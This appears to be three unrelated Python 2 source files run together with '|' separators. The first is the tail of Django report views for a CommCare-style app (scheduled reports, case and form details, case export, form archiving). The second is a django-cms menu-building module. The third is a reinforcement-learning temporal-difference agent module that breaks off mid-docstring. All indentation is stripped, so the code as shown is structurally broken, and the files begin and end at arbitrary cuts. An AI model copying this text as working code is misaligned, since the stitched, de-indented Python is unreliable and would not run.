messages.success(request, "Scheduled report updated!")
touch_saved_reports_views(request.couch_user, domain)
return HttpResponseRedirect(reverse('reports_home', args=(domain,)))
context['form'] = form
context['day_value'] = getattr(instance, "day", 1)
context['weekly_day_options'] = ReportNotification.day_choices()
context['monthly_day_options'] = [(i, i) for i in range(1, 32)]
if is_new:
context['form_action'] = "Create a new"
context['report']['title'] = "New Scheduled Report"
else:
context['form_action'] = "Edit"
context['report']['title'] = "Edit Scheduled Report"
return render(request, template, context)
@login_and_domain_required
@require_POST
def delete_scheduled_report(request, domain, scheduled_report_id):
user_id = request.couch_user._id
try:
rep = ReportNotification.get(scheduled_report_id)
except ResourceNotFound:
# was probably already deleted by a fast-clicker.
pass
else:
if user_id != rep.owner._id:
return HttpResponseBadRequest()
rep.delete()
messages.success(request, "Scheduled report deleted!")
return HttpResponseRedirect(reverse("reports_home", args=(domain,)))
@login_and_domain_required
def send_test_scheduled_report(request, domain, scheduled_report_id):
from corehq.apps.reports.tasks import send_report
from corehq.apps.users.models import CouchUser, CommCareUser, WebUser
user_id = request.couch_user._id
notification = ReportNotification.get(scheduled_report_id)
try:
user = WebUser.get_by_user_id(user_id, domain)
except CouchUser.AccountTypeError:
user = CommCareUser.get_by_user_id(user_id, domain)
try:
send_report.delay(notification._id)
except Exception, e:
import logging
logging.exception(e)
messages.error(request, "An error occured, message unable to send")
else:
messages.success(request, "Test message sent to %s" % user.get_email())
return HttpResponseRedirect(reverse("reports_home", args=(domain,)))
def get_scheduled_report_response(couch_user, domain, scheduled_report_id,
email=True, attach_excel=False):
"""
This function somewhat confusingly returns a tuple of: (response, excel_files)
If attach_excel is false, excel_files will always be an empty list.
"""
# todo: clean up this API?
from django.http import HttpRequest
request = HttpRequest()
request.couch_user = couch_user
request.user = couch_user.get_django_user()
request.domain = domain
request.couch_user.current_domain = domain
notification = ReportNotification.get(scheduled_report_id)
return _render_report_configs(request, notification.configs,
notification.domain,
notification.owner_id,
couch_user,
email, attach_excel=attach_excel)
def _render_report_configs(request, configs, domain, owner_id, couch_user, email, notes=None, attach_excel=False):
from dimagi.utils.web import get_url_base
report_outputs = []
excel_attachments = []
format = Format.from_format(request.GET.get('format') or Format.XLS_2007)
for config in configs:
content, excel_file = config.get_report_content(attach_excel=attach_excel)
if excel_file:
excel_attachments.append({
'title': config.full_name + "." + format.extension,
'file_obj': excel_file,
'mimetype': format.mimetype
})
report_outputs.append({
'title': config.full_name,
'url': config.url,
'content': content
})
date_range = config.get_date_range()
return render(request, "reports/report_email.html", {
"reports": report_outputs,
"domain": domain,
"couch_user": owner_id,
"DNS_name": get_url_base(),
"owner_name": couch_user.full_name or couch_user.get_email(),
"email": email,
"notes": notes or getattr(config, "description", ""),
"startdate": date_range["startdate"] if date_range else "",
"enddate": date_range["enddate"] if date_range else "",
}), excel_attachments
@login_and_domain_required
@permission_required("is_superuser")
def view_scheduled_report(request, domain, scheduled_report_id):
return get_scheduled_report_response(
request.couch_user, domain, scheduled_report_id, email=False
)[0]
@require_case_view_permission
@login_and_domain_required
@require_GET
def case_details(request, domain, case_id):
timezone = util.get_timezone(request.couch_user.user_id, domain)
try:
case = _get_case_or_404(domain, case_id)
except Http404:
messages.info(request, "Sorry, we couldn't find that case. If you think this is a mistake please report an issue.")
return HttpResponseRedirect(CaseListReport.get_url(domain=domain))
try:
owner_name = CommCareUser.get_by_user_id(case.owner_id, domain).raw_username
except Exception:
try:
owning_group = Group.get(case.owner_id)
owner_name = owning_group.display_name if owning_group.domain == domain else ''
except Exception:
owner_name = None
try:
username = CommCareUser.get_by_user_id(case.user_id, domain).raw_username
except Exception:
username = None
return render(request, "reports/reportdata/case_details.html", {
"domain": domain,
"case_id": case_id,
"case": case,
"username": username,
"owner_name": owner_name,
"slug": CaseListReport.slug,
"report": dict(
name=case_inline_display(case),
slug=CaseListReport.slug,
is_async=False,
),
"layout_flush_content": True,
"timezone": timezone,
"case_display_options": {
"display": request.project.get_case_display(case),
"timezone": timezone,
"get_case_url": lambda case_id: reverse(
case_details, args=[domain, case_id])
},
})
@require_case_view_permission
@login_and_domain_required
@require_GET
def case_xml(request, domain, case_id):
case = _get_case_or_404(domain, case_id)
version = request.GET.get('version', V2)
return HttpResponse(case.to_xml(version), content_type='text/xml')
def _get_case_or_404(domain, case_id):
try:
case = CommCareCase.get(case_id)
except ResourceNotFound:
case = None
if case is None or case.doc_type != "CommCareCase" or case.domain != domain:
raise Http404
return case
def generate_case_export_payload(domain, include_closed, format, group, user_filter, process=None):
"""
Returns a FileWrapper object, which only the file backend in django-soil supports
"""
status = 'all' if include_closed else 'open'
case_ids = CommCareCase.get_all_cases(domain, status=status, wrapper=lambda r: r['id'])
class stream_cases(object):
def __init__(self, all_case_ids):
self.all_case_ids = all_case_ids
def __iter__(self):
for case_ids in chunked(self.all_case_ids, 500):
for case in wrapped_docs(CommCareCase, case_ids):
yield case
def __len__(self):
return len(self.all_case_ids)
# todo deal with cached user dict here
users = get_all_users_by_domain(domain, group=group, user_filter=user_filter)
groups = Group.get_case_sharing_groups(domain)
fd, path = tempfile.mkstemp()
with os.fdopen(fd, 'wb') as file:
workbook = WorkBook(file, format)
export_cases_and_referrals(
domain,
stream_cases(case_ids),
workbook,
users=users,
groups=groups,
process=process
)
export_users(users, workbook)
workbook.close()
return FileWrapper(open(path))
@login_or_digest
@require_case_export_permission
@require_GET
def download_cases(request, domain):
include_closed = json.loads(request.GET.get('include_closed', 'false'))
try:
format = Format.from_format(request.GET.get('format') or Format.XLS_2007)
except URLError as e:
return HttpResponseBadRequest(e.reason)
group = request.GET.get('group', None)
user_filter, _ = FilterUsersField.get_user_filter(request)
async = request.GET.get('async') == 'true'
kwargs = {
'domain': domain,
'include_closed': include_closed,
'format': format,
'group': group,
'user_filter': user_filter,
}
payload_func = SerializableFunction(generate_case_export_payload, **kwargs)
content_disposition = 'attachment; filename="{domain}_data.{ext}"'.format(domain=domain, ext=format.extension)
mimetype = "%s" % format.mimetype
def generate_payload(payload_func):
if async:
download = DownloadBase()
a_task = prepare_download.delay(download.download_id, payload_func,
content_disposition, mimetype)
download.set_task(a_task)
return download.get_start_response()
else:
payload = payload_func()
response = HttpResponse(payload)
response['Content-Type'] = mimetype
response['Content-Disposition'] = content_disposition
return response
return generate_payload(payload_func)
def _get_form_context(request, domain, instance_id):
timezone = util.get_timezone(request.couch_user.user_id, domain)
instance = _get_form_or_404(instance_id)
try:
assert domain == instance.domain
except AssertionError:
raise Http404()
display = request.project.get_form_display(instance)
context = {
"domain": domain,
"display": display,
"timezone": timezone,
"instance": instance
}
context['form_render_options'] = context
return context
def _get_form_or_404(id):
# maybe this should be a more general utility a-la-django's get_object_or_404
try:
xform_json = XFormInstance.get_db().get(id)
except ResourceNotFound:
raise Http404()
doc_type = doc_types().get(xform_json.get('doc_type'))
if not doc_type:
raise Http404()
return doc_type.wrap(xform_json)
@require_form_view_permission
@login_and_domain_required
@require_GET
def form_data(request, domain, instance_id):
context = _get_form_context(request, domain, instance_id)
try:
form_name = context['instance'].form["@name"]
except KeyError:
form_name = "Untitled Form"
context.update({
"slug": inspect.SubmitHistory.slug,
"form_name": form_name,
"form_received_on": context['instance'].received_on
})
return render(request, "reports/reportdata/form_data.html", context)
@require_form_view_permission
@login_and_domain_required
@require_GET
def case_form_data(request, domain, case_id, xform_id):
context = _get_form_context(request, domain, xform_id)
context['case_id'] = case_id
#todo: additional formatting options
#todo: sanity check that xform_id has case_block
return HttpResponse(render_form(
context['instance'], domain, options=context))
@require_form_view_permission
@login_and_domain_required
@require_GET
def download_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert(domain == instance.domain)
return couchforms_views.download_form(request, instance_id)
@login_or_digest
@require_form_view_permission
@require_GET
def download_attachment(request, domain, instance_id):
attachment = request.GET.get('attachment', False)
if not attachment:
return HttpResponseBadRequest("Invalid attachment.")
instance = _get_form_or_404(instance_id)
assert(domain == instance.domain)
return couchforms_views.download_attachment(request, instance_id, attachment)
@require_form_view_permission
@require_permission(Permissions.edit_data)
@require_POST
def archive_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert instance.domain == domain
if instance.doc_type == "XFormInstance":
instance.archive(user=request.couch_user._id)
notif_msg = _("Form was successfully archived.")
elif instance.doc_type == "XFormArchived":
notif_msg = _("Form was already archived.")
else:
notif_msg = _("Can't archive documents of type %s. How did you get here??") % instance.doc_type
params = {
"notif": notif_msg,
"undo": _("Undo"),
"url": reverse('unarchive_form', args=[domain, instance_id]),
"id": "restore-%s" % instance_id
}
msg_template = """{notif} <a href="javascript:document.getElementById('{id}').submit();">{undo}</a>
<form id="{id}" action="{url}" method="POST"></form>""" if instance.doc_type == "XFormArchived" else '%(notif)s'
msg = msg_template.format(**params)
messages.success(request, mark_safe(msg), extra_tags='html')
redirect = request.META.get('HTTP_REFERER')
if not redirect:
redirect = inspect.SubmitHistory.get_url(domain)
# check if referring URL was a case detail view, then make sure
# the case still exists before redirecting.
template = reverse('case_details', args=[domain, 'fake_case_id'])
template = template.replace('fake_case_id', '([^/]*)')
case_id = re.findall(template, redirect)
if case_id:
try:
case = CommCareCase.get(case_id[0])
if case._doc['doc_type'] == 'CommCareCase-Deleted':
raise ResourceNotFound
except ResourceNotFound:
redirect = reverse('project_report_dispatcher', args=[domain, 'case_list'])
return HttpResponseRedirect(redirect)
@require_form_view_permission
@require_permission(Permissions.edit_data)
def unarchive_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert instance.domain == domain
if instance.doc_type == "XFormArchived":
instance.unarchive(user=request.couch_user._id)
else:
assert instance.doc_type == "XFormInstance"
messages.success(request, _("Form was successfully restored."))
redirect = request.META.get('HTTP_REFERER')
if not redirect:
redirect = reverse('render_form_data', args=[domain, instance_id])
return HttpResponseRedirect(redirect)
# Weekly submissions by xmlns
def mk_date_range(start=None, end=None, ago=timedelta(days=7), iso=False):
if isinstance(end, basestring):
end = parse_date(end)
if isinstance(start, basestring):
start = parse_date(start)
if not end:
end = datetime.utcnow()
if not start:
start = end - ago
if iso:
return json_format_datetime(start), json_format_datetime(end)
else:
return start, end
@login_and_domain_required
@permission_required("is_superuser")
def clear_report_caches(request, domain):
print "CLEARING CACHE FOR DOMAIN", domain
print "ALL CACHES", cache.all()
return HttpResponse("TESTING")
|
|
# -*- coding: utf-8 -*-
from logging import getLogger
from cms.utils import get_cms_setting
from cms.utils.django_load import load
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.cache import cache
from django.core.urlresolvers import NoReverseMatch
from django.utils.translation import get_language
from menus.exceptions import NamespaceAllreadyRegistered
from menus.models import CacheKey
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
import copy
logger = getLogger('menus')
def _build_nodes_inner_for_one_menu(nodes, menu_class_name):
'''
This is an easier to test "inner loop" building the menu tree structure
for one menu (one language, one site)
'''
done_nodes = {} # Dict of node.id:Node
final_nodes = []
# This is to prevent infinite loops - we need to compare the number of
# times we see a specific node to "something", and for the time being,
# it's the total number of nodes
list_total_length = len(nodes)
while nodes:
# For when the node has a parent_id but we haven't seen it yet.
# We must not append it to the final list in this case!
should_add_to_final_list = True
node = nodes.pop(0)
# Increment the "seen" counter for this specific node.
node._counter = getattr(node,'_counter',0) + 1
# Implicit namespacing by menu.__name__
if not node.namespace:
node.namespace = menu_class_name
if node.namespace not in done_nodes:
# We need to create the namespace dict to avoid KeyErrors
done_nodes[node.namespace] = {}
# If we have seen the parent_id already...
if node.parent_id in done_nodes[node.namespace] :
# Implicit parent namespace by menu.__name__
if not node.parent_namespace:
node.parent_namespace = menu_class_name
parent = done_nodes[node.namespace][node.parent_id]
parent.children.append(node)
node.parent = parent
# If it has a parent_id but we haven't seen it yet...
elif node.parent_id:
# We check for infinite loops here, by comparing the number of
# times we "saw" this node to the number of nodes in the list
if node._counter < list_total_length:
nodes.append(node)
# Never add this node to the final list until it has a real
# parent (node.parent)
should_add_to_final_list = False
if should_add_to_final_list:
final_nodes.append(node)
# add it to the "seen" list
done_nodes[node.namespace][node.id] = node
return final_nodes
class MenuPool(object):
def __init__(self):
self.menus = {}
self.modifiers = []
self.discovered = False
def discover_menus(self):
if self.discovered:
return
load('menu')
from menus.modifiers import register
register()
self.discovered = True
def clear(self, site_id=None, language=None, all=False):
'''
This invalidates the cache for a given menu (site_id and language)
'''
if all:
cache_keys = CacheKey.objects.get_keys()
else:
cache_keys = CacheKey.objects.get_keys(site_id, language)
to_be_deleted = cache_keys.distinct().values_list('key', flat=True)
cache.delete_many(to_be_deleted)
cache_keys.delete()
def register_menu(self, menu):
from menus.base import Menu
assert issubclass(menu, Menu)
if menu.__name__ in self.menus.keys():
raise NamespaceAllreadyRegistered(
"[%s] a menu with this name is already registered" % menu.__name__)
self.menus[menu.__name__] = menu()
def register_modifier(self, modifier_class):
from menus.base import Modifier
assert issubclass(modifier_class, Modifier)
if not modifier_class in self.modifiers:
self.modifiers.append(modifier_class)
def _build_nodes(self, request, site_id):
"""
This is slow. Caching must be used.
One menu is built per language and per site.
Namespaces: they are ID prefixes to avoid node ID clashes when plugging
multiple trees together.
- We iterate on the list of nodes.
- We store encountered nodes in a dict (with namespaces):
done_nodes[<namespace>][<node's id>] = node
- When a node has a parent defined, we lookup that parent in done_nodes
if it's found:
set the node as the node's parent's child (re-read this)
else:
the node is put at the bottom of the list
"""
# Cache key management
lang = get_language()
prefix = getattr(settings, "CMS_CACHE_PREFIX", "menu_cache_")
key = "%smenu_nodes_%s_%s" % (prefix, lang, site_id)
if request.user.is_authenticated():
key += "_%s_user" % request.user.pk
cached_nodes = cache.get(key, None)
if cached_nodes:
return cached_nodes
final_nodes = []
for menu_class_name in self.menus:
try:
nodes = self.menus[menu_class_name].get_nodes(request)
except NoReverseMatch:
# Apps might raise NoReverseMatch if an apphook does not yet
# exist, skip them instead of crashing
nodes = []
toolbar = getattr(request, 'toolbar', None)
if toolbar and toolbar.is_staff:
messages.error(request, _('Menu %s cannot be loaded. Please, make sure all its urls exist and can be resolved.') % menu_class_name)
logger.error("Menu %s could not be loaded." % menu_class_name, exc_info=True)
# nodes is a list of navigation nodes (page tree in cms + others)
final_nodes += _build_nodes_inner_for_one_menu(nodes, menu_class_name)
cache.set(key, final_nodes, get_cms_setting('CACHE_DURATIONS')['menus'])
# We need to have a list of the cache keys for languages and sites that
# span several processes - so we follow the Django way and share through
# the database. It's still cheaper than recomputing every time!
# This way we can selectively invalidate per-site and per-language,
# since the cache shared but the keys aren't
CacheKey.objects.get_or_create(key=key, language=lang, site=site_id)
return final_nodes
def apply_modifiers(self, nodes, request, namespace=None, root_id=None, post_cut=False, breadcrumb=False):
if not post_cut:
nodes = self._mark_selected(request, nodes)
for cls in self.modifiers:
inst = cls()
nodes = inst.modify(request, nodes, namespace, root_id, post_cut, breadcrumb)
return nodes
def get_nodes(self, request, namespace=None, root_id=None, site_id=None, breadcrumb=False):
self.discover_menus()
if not site_id:
site_id = Site.objects.get_current().pk
nodes = self._build_nodes(request, site_id)
nodes = copy.deepcopy(nodes)
nodes = self.apply_modifiers(nodes, request, namespace, root_id, post_cut=False, breadcrumb=breadcrumb)
return nodes
def _mark_selected(self, request, nodes):
sel = None
for node in nodes:
node.sibling = False
node.ancestor = False
node.descendant = False
node.selected = False
if node.get_absolute_url() == request.path[:len(node.get_absolute_url())]:
if sel:
if len(node.get_absolute_url()) > len(sel.get_absolute_url()):
sel = node
else:
sel = node
else:
node.selected = False
if sel:
sel.selected = True
return nodes
def get_menus_by_attribute(self, name, value):
self.discover_menus()
found = []
for menu in self.menus.items():
if hasattr(menu[1], name) and getattr(menu[1], name, None) == value:
found.append((menu[0], menu[1].name))
return found
def get_nodes_by_attribute(self, nodes, name, value):
found = []
for node in nodes:
if node.attr.get(name, None) == value:
found.append(node)
return found
menu_pool = MenuPool()
|
|
"""
Temporal difference agents.
$Id: td.py,v 1.13 2006/04/07 23:24:57 jp Exp $
"""
from plastk.base import *
from plastk.params import *
from plastk.rl import Agent,is_terminal
from plastk.utils import mmax,weighted_sample,inf
from plastk import rand
import Numeric
from Numeric import nonzero,putmask,array,zeros,dot,argmax
from math import exp,log
class TDAgent(Agent):
"""
A generic temporal-difference (TD) agent with discrete actions.
To create a new TD agent, override this class and implement the methods
.Q(sensation,action=None) and .update_Q(sensation,action,delda,on_policy=True).
Parameters:
alpha -- The learning rate, default = 0.1
gamma -- The discount factor, default = 1.0
lambda_ -- The eligibility discount factor, default = 0.0.
step_method -- The method for doing TD updates: 'sarsa' or 'q_learning'.
default = 'sarsa'
action_selection -- The action selection method, default 'epsilon_greedy'.
To change action selection, set this to the name of the new method,
e.g. 'softmax'.
initial_epsilon -- The starting epsilon for epsilon_greedy selection. (default=0.1)
min_epsilon -- The minimum (final) epsilon. (default = 0.0)
epsilon_half_life -- The half-life for epsilon annealing. (default = 1)
initial_temperature -- The starting temperature for softmax (Boltzman distribution)
selection. (default = 1.0)
min_temperature -- The min (final) temperature for softmax selection.
(default = 0.01)
temperature_half_life -- The temperature half-life for softmax selection
(default = 1)
actions -- The list of available actions - can be any Python object
that is understood as an action by the environment
"""
alpha = Magnitude(default=0.1)
gamma = Magnitude(default=1.0)
lambda_ = Magnitude(default=0.0)
step_method = Parameter(default="sarsa")
action_selection = Parameter(default="epsilon_greedy")
# epsilon-greedy selection parameters
initial_epsilon = Magnitude(default=0.1)
min_epsilon = Magnitude(default=0.0)
epsilon_half_life = Number(default=1, bounds=(0,None))
# softmax selection parameters
initial_temperature = Number(default=1.0, bounds=(0,None))
min_temperature = Number(default=0.01, bounds=(0,None))
temperature_half_life = Number(default=1, bounds=(0,None))
actions = Parameter(default=[])
prune_eligibility = Magnitude(default=0.001)
replacing_traces = Parameter(default=True)
history_log = Parameter(default=None)
allow_learning = Parameter(default=True)
def __init__(self,**args):
from plastk.utils import LogFile
super(TDAgent,self).__init__(**args)
self.nopickle.append('policy_fn')
self.policy_fn = getattr(self,self.action_selection)
self.total_steps = 0
if isinstance(self.history_log,str):
self._history_file = LogFile(self.history_log)
elif isinstance(self.history_log,file) or isinstance(self.history_log,LogFile):
self._history_file = self.history_log
def unpickle(self):
"""
Called automatically when the agent is unpickled. Sets
the action-selection function to its appropriate value.
"""
super(TDAgent,self).unpickle()
self.policy_fn = getattr(self,self.action_selection)
def __call__(self,sensation,reward=None):
"""
Do a step. Calls the function selected in self.step_method
and returns the action.
"""
step_fn = getattr(self,self.step_method+'_step')
action_index = step_fn(sensation,reward)
if self.history_log:
if reward is None:
self._history_file.write('start\n')
self._history_file.write(`sensation`+'\n')
self._history_file.write(`reward`+'\n')
if not is_terminal(sensation):
self._history_file.write(`action_index`+'\n')
return self.actions[action_index]
def Q(self,sensation,action=None):
"""
Return Q(s,a). If action is None, return an array
of Q-values for each action in self.actions
with the given sensation.
You must override this method to implement a TDAgent subclass.
"""
raise NYI
def update_Q(self,sensation,action,delta,on_policy=True):
"""
Update Q(sensation,action) by delta. on_policy indicates
whether the step that produced the update was on- or
off-policy. Any eligibility trace updates should be done from
within this method.
You must override this method to implement a TDAgent subclass.
"""
raise NYI
def sarsa_step(self,sensation,reward=None):
"""
Do a step using the SARSA update method. Selects an action,
computes the TD update and calls self.update_Q. Returns the
agent's next action.
"""
if reward == None:
return self._start_episode(sensation)
rho = self.rho(reward)
next_action = self.policy(sensation)
if is_terminal(sensation):
value = 0
else:
value = self.Q(sensation,next_action)
last_value = self.Q(self.last_sensation,self.last_action)
delta = rho + (self.gamma * value - last_value)
self.verbose("controller step = %d, rho = %.2f"
% (self.total_steps,rho))
self.verbose(("Q(t-1) = %.5f, Q(t) = %.5f, diff = %.5f,"+
"delta = %.5f, terminal? = %d")
% (last_value,value,value-last_value,
delta,is_terminal(sensation)))
if self.allow_learning:
self.update_Q(self.last_sensation,self.last_action,delta)
self.last_sensation = sensation
self.last_action = next_action
if isinstance(reward,list):
self.total_steps += len(reward)
else:
self.total_steps += 1
return next_action
def q_learning_step(self,sensation,reward=None):
"""
Do a step using Watkins' Q(\lambda) update method. Selects an
action, computes the TD update and calls
self._q_learning_training. Returns the agent's next action.
"""
if reward == None:
return self._start_episode(sensation)
if self.allow_learning:
self._q_learning_training(self.last_sensation,self.last_action,reward,sensation)
self.last_sensation = sensation
self.last_action = self.policy(sensation)
if isinstance(reward,list):
self.total_steps += len(reward)
else:
self.total_steps += 1
return self.last_action
def _q_learning_training(self,sensation,action,reward,next_sensation):
"""
Do a single Q-lambda training step given (s,a,r,s'). Can be
called from outside the q_learning_step method for off-policy
training, experience replay, etc.
"""
rho = self.rho(reward)
last_Q = self.Q(sensation)
last_value = last_Q[action]
if is_terminal(next_sensation):
value = 0
else:
value = max(self.Q(next_sensation))
delta = rho + (self.gamma * value - last_value)
self.verbose("r = %.5f, Q(t-1) = %.5f, Q(t) = %.5f, diff = %.5f, delta = %.5f, terminal? = %d"
% (rho,last_value,value,value-last_value,delta,is_terminal(next_sensation)))
self.update_Q(sensation,action,delta,on_policy = (last_Q[action] == max(last_Q)))
if delta:
assert (self.Q(sensation,action) - last_value)/delta < 1.0
def _start_episode(self,sensation):
"""
Start a new episode. Called from self.__call__ when the reward is None.
"""
self.last_sensation = sensation
self.last_action = self.policy(sensation)
return self.last_action
def policy(self,sensation):
"""
Given a sensation, return an action. Uses
self.action_selection to get a distribution over the agent's
actions. Uses self.applicable_actions to prevent selecting
inapplicable actions.
Returns 0 if is_terminal(sensation).
"""
if not is_terminal(sensation):
actions = self.applicable_actions(sensation)
return actions[weighted_sample(self.policy_fn(sensation,actions))]
else:
# In the terminal state, the action is irrelevant
return 0
def epsilon_greedy(self,sensation,applicable_actions):
"""
Given self.epsilon() and self.Q(), return a distribution over
applicable_actions as an array where each element contains the
a probability mass for the corresponding action. I.e. The
action with the highest Q gets p = self.epsilon() and the
others get the remainder of the mass, uniformly distributed.
"""
Q = array([self.Q(sensation,action) for action in applicable_actions])
# simple epsilon-greedy policy
# get a vector with a 1 where each max element is, zero elsewhere
mask = (Q == mmax(Q))
num_maxes = len(nonzero(mask))
num_others = len(mask) - num_maxes
if num_others == 0: return mask
e0 = self.epsilon()/num_maxes
e1 = self.epsilon()/num_others
result = zeros(len(mask))+0.0
putmask(result,mask,1-e0)
putmask(result,mask==0,e1)
return result
def softmax(self,sensation,applicable_actions):
"""
Given self.temperature() and self.Q(), return a Bolzman
distribution over applicable_actions as an array where each
element contains the a probability mass for the corresponding
action.
"""
temp = self.temperature()
self.verbose("softmax, temperature = %.3f" % temp)
Q = array([self.Q(sensation,action) for action in applicable_actions])
return softmax(Q,temp)
def normalized_softmax(self,sensation,applicable_actions):
"""
Like softmax, except that the Q values are scaled into the
range [0,1]. May make setting the initial temperature easier than with softmax.
"""
temp = self.temperature()
self.verbose("softmax, temperature = %.3f" % temp)
Q = array([self.Q(sensation,action) for action in applicable_actions])
return softmax(normalize_minmax(Q),temp)
def temperature(self):
"""
Using initial_temperature, min_temperature, and temperature_half_life,
compute the temperature after self.total_steps, steps.
"""
Ti = self.initial_temperature
Tm = self.min_temperature
decay = log(2)/self.temperature_half_life
return Tm + (Ti - Tm) * exp( -decay * self.total_steps )
def epsilon(self):
"""
Using initial_epsilon, min_epsilon, and epsilon_half_life,
compute epsilon after self.total_steps, steps.
"""
Ei = self.initial_epsilon
Em = self.min_epsilon
decay = log(2)/self.epsilon_half_life
return Em + (Ei - Em) * exp( -decay * self.total_steps )
def rho(self,reward):
"""
Compute the reward since the last step.
IF the reward is a scalar, it is returned unchanged.
If reward is a list, it is assumed to be a list of rewards
accrued at a constant time step, and the discounted sum is
returned.
"""
if isinstance(reward,list):
result = 0
for r in reward:
result = self.gamma*result + r
else:
result = reward
return result
def applicable(self,action,sensation):
"""
If the given action has a method called 'applicable' return
the value of action.applicable(sensation), otherwise return True.
"""
if 'applicable' in dir(action):
return action.applicable(sensation)
else:
return True
def applicable_actions(self,sensation):
"""
Return a list of the actions that are applicable to the given
sensation.
"""
return [a for a in range(len(self.actions))
if self.applicable(self.actions[a],sensation)]
class LinearTDAgent(TDAgent):
"""
A TD agent that takes a sensation as a 1D Numeric vector of
features and computes Q as a linear function of that sensation,
using simple gradient descent. The function is stored in the
weight matrix self.w, such that Q(s) can be computed as w*s.
Assumes a discrete set of actions. Uses replacing eligibility
traces.
Parameters:
num_features = The number of input features (default = 1)
initial_w = A scalar value with which to initialize the weight
matrix.
"""
num_features = PositiveInt(default=1)
initial_w = Number(default=0.0)
def __init__(self,**params):
super(LinearTDAgent,self).__init__(**params)
self.reset_w()
self.reset_e()
def _start_episode(self,sensation):
self.reset_e()
return super(LinearTDAgent,self)._start_episode(sensation)
def reset_w(self):
"""
Reset the weight matrix to self.initial_w.
"""
self.w = zeros((len(self.actions),self.num_features),'f') + self.initial_w
def reset_e(self):
"""
Reset the eligibility traces for self.w to all zeros.
"""
self.e = zeros((len(self.actions),self.num_features),'f') + 0.0
def Q(self,state,action=None):
"""
Compute Q(s,a) from W*s.
"""
if action is None:
return dot(self.w, state)
else:
return dot(self.w[action],state)
def update_Q(self,sensation,action,delta,on_policy=True):
"""
Do a linear update of the weights.
"""
if self.lambda_ and on_policy:
self.e *= self.lambda_
if self.prune_eligibility > 0.0:
self.e *= (self.e > self.prune_eligibility)
else:
self.e *= 0.0
self.e[action] += sensation
if self.replacing_traces:
putmask(self.e,self.e > 1,1)
self.w += self.e * (self.alpha/(sum(sensation))) * delta
class TabularTDAgent(TDAgent):
"""
A TDAgent for environments with discrete states and actions.
Sensations/states can be any hashable Python object, and the
universe of sensations need not be specified in advance. The agent
stores and updates a separate Q estimate for every (s,a) pair.
Parameters:
initial_q -- The initial Q estimate for each (s,a) pair. (default = 0.0)
"""
initial_q = Number(default=0.0)
def __init__(self,**params):
super(TabularTDAgent,self).__init__(**params)
self.reset_q()
self.reset_e()
def _start_episode(self,sensation):
self.reset_e()
return super(TabularTDAgent,self)._start_episode(sensation)
def reset_q(self):
self.q_table = {}
def reset_e(self):
self.e = {}
def Q(self,s,a=None):
if a is None:
result = [self.Q(s,a) for a in range(len(self.actions))]
else:
result = self.q_table.get((s,a),self.initial_q)
self.debug('Q(',s,',',a,') = ',result)
return result
def update_Q(self,s,a,delta,on_policy=True):
if not on_policy:
self.reset_e()
if (s,a) not in self.q_table:
self.q_table[(s,a)] = self.initial_q
if self.lambda_:
to_be_deleted = []
for x in self.e:
self.e[x] *= self.lambda_
if self.e[x] < self.prune_eligibility:
to_be_deleted.append(x)
for x in to_be_deleted:
del self.e[x]
if self.replacing_traces:
self.e[(s,a)] = 1
else:
self.e[(s,a)] += 1
for x,e in self.e.iteritems():
self.q_table[x] += self.alpha * e * delta
class TabularMemoryTDAgent(TabularTDAgent):
"""
A Tabular TD agent that keeps a memory of the last N steps of
sensations and actions, and does Q learning/sarsa using the
contents of memory as its state.
"""
memory_steps = NonNegativeInt(default=1)
def __init__(self,**params):
super(TabularMemoryTDAgent,self).__init__(**params)
self._memory = []
def __call__(self,sensation,reward=None):
if reward is None:
self._memory = [sensation]
else:
self._memory.append(sensation)
if is_terminal(sensation):
return super(TabularMemoryTDAgent,self).__call__(sensation,reward)
else:
action = super(TabularMemoryTDAgent,self).__call__(tuple(self._memory),reward)
assert self.actions[self.last_action] == action
self._memory.append(self.last_action)
if len(self._memory) > (2*self.memory_steps + 1):
del self._memory[0:2]
return action
class LinearTabularTDAgent(LinearTDAgent):
"""
Subclass of LinearTDAgent for 'tabular' environments. Assumes the
state/sensation is a single integer. Use the num_features
parameter inherited from LinearTDAgent to specify the total number
of states/sensations.
"""
def __call__(self,sensation,reward=None):
if not is_terminal(sensation):
assert(type(sensation) == int)
s = zeros(self.num_features)
s[sensation] = 1.0
else:
s = sensation
return super(LinearTabularTDAgent,self).__call__(s,reward)
class LinearListAgent(LinearTDAgent):
"""
A subclss of LinearTDAgent where the sensation is assumed to be a
list of discrete features. For sparse feature representations,
this is more compact than the feature-vector representation of
LinearTDAgent.
"""
def __call__(self,sensation,reward=None):
if is_terminal(sensation):
new_sensation = sensation
else:
new_sensation = zeros(self.num_features,'f')
for f in sensation:
new_sensation[f] = 1
return super(LinearListAgent,self).__call__(new_sensation,reward)
class UniformTiledAgent(LinearListAgent):
"""
A LinearTDAgent subclass for continuous state spaces that
automatically tiles the input space. For high-dimensional inputs,
the input can be separated into a several uniformly distributed
'receptive fields' (rfs) that may overlap, and each rf is tiled
separately.
Parameters:
num_rfs -- The number of receptive fields to use (default=1)
rf_width -- The width of the receptive fields
(default=[D/num_rfs] where D = input dimensionality)
num_tilings -- The number of tilings to use for each rf.
tile_width -- The width of each tile.
num_features -- The total combined memory size for all rfs.
Each separate rf is assumed to use the same tiling parameters.
Examples:
D = 9 , num_rfs = 3, rf_width = <default> will give the following
|-rf0-| |-rf2-|
Features: [ 0 1 2 3 4 5 6 7 8 ]
|-rf1-|
D = 10 , num_rfs = 3, rf_width = 4 will give the following
|--rf0--| |--rf2--|
Features: [ 0 1 2 3 4 5 6 7 8 9 ]
|--rf1--|
RF placements are determined with function place_rfs.
"""
num_rfs = PositiveInt(default=1)
rf_width = Parameter(None)
num_tilings = PositiveInt(default=1)
tile_width = Number(default=1)
def __init__(self,**args):
super(UniformTiledAgent,self).__init__(**args)
if not self.rf_width:
self.rf_width = self.num_features/self.num_rfs
def __call__(self,sensation,reward=None):
if not is_terminal(sensation):
sensation = tile_uniform_rfs(array(sensation)/self.tile_width,
self.num_rfs,
self.rf_width,
self.num_tilings,
self.num_features/self.num_rfs)
return super(UniformTiledAgent,self).__call__(sensation,reward)
##################################
# utility functions
def softmax(ar,temp):
"""
Given an array and a temperature, return the Boltzman distribution
over that array.
For an array X, and temp T returns a new array containing:
exp(Xi/T)/sum_j(exp(Xj/T) for all Xi.
If temp == 0 or any value in the array is inf, the function
